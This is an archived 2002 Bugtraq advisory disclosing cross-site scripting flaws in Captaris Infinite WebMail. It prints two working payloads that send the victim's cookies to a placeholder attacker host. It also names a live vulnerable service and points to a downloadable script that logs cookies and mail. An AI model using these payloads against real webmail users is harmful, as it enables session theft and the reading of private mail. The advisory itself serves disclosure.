[28222] in bugtraq
Captaris (Infinite) WebMail XSS
daemon@ATHENA.MIT.EDU (Pedram Amini)
Mon Dec 16 18:53:52 2002
From: "Pedram Amini" <pedram@redhive.com>
To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>
Date: Mon, 16 Dec 2002 18:23:10 -0500
Message-ID: <000001c2a55a$19a727e0$6400000a@idlap1605>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
I figured it was about time I hopped on the XSS band-wagon.
Captaris (www.captaris.com) Infinite WebMail application is vulnerable to
Cross-Site Scripting (XSS) attacks. The application fails to filter the
following tags that can both be used to redirect a user to an attack script:
Launch on e-mail open:
<p style="left:expression(document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie)">
Launch on mouse over:
<b onMouseOver= "document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie\">
I am sure there are other XSS attack methods that can also be utilized to
bypass their basic filtering.
A sample vulnerable service is provided by dog.com (www.dogmail.com), they
are running WebMail v3.61.05. A sample cookie and mail logger script that
will retrieve all of the messages in the users main mailbox has been
attached, and can also be found at
http://pedram.redhive.com/advisories/dogmail.cgi
-pedram
http://pedram.redhive.com
